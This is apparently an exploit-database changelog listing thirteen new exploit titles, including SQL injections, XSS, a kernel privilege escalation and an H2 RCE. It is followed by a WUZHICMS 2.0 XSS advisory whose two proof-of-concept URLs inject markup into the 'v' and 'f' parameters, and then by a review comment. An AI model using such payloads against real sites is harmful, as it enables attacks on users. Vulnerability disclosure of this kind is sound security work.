
13 changes to exploits/shellcodes

Snes9K 0.0.9z - Denial of Service (PoC)
Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation
H2 Database 1.4.196 - Remote Code Execution
ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting
Fork CMS 5.4.0 - Cross-Site Scripting
Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection
Education Website 1.0 - 'subject' SQL Injection
Singleleg MLM Software 1.0 - 'msg_id' SQL Injection
Binary MLM Software 1.0 - 'pid' SQL Injection
Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection
WUZHICMS 2.0 - Cross-Site Scripting
Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
# Title: WUZHICMS 2.0 - Cross-Site Scripting
# Author: Felipe "Renzi" Gabriel
# Date: 2018-10-01
# Vendor: http://www.wuzhicms.com
# Software: WUZHICMS 2.0
# CVE: CVE-2018-17832
# Technical Details & Description:
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0 web-application.
# The vulnerability is located in the 'v' and 'f' parameters of the`index.php` action GET method request.
# PoC
http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee> |
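Review bot: The description line "The vulnerability is located in the 'v' and 'f' parameters" does not say where the values end up in the response, yet both PoC URLs open with a quote and a closing angle bracket, which implies the parameters are echoed unencoded inside a quoted HTML attribute. Suggest adding a comment line that states the output context and whether the issue is reflected or stored, so a maintainer reading the entry can tell that contextual output encoding of `v` and `f` is the fix. The header also records "Software: WUZHICMS 2.0" but no tested environment and no fixed version or vendor advisory; add those fields, or state that no fix was available as of the listed date.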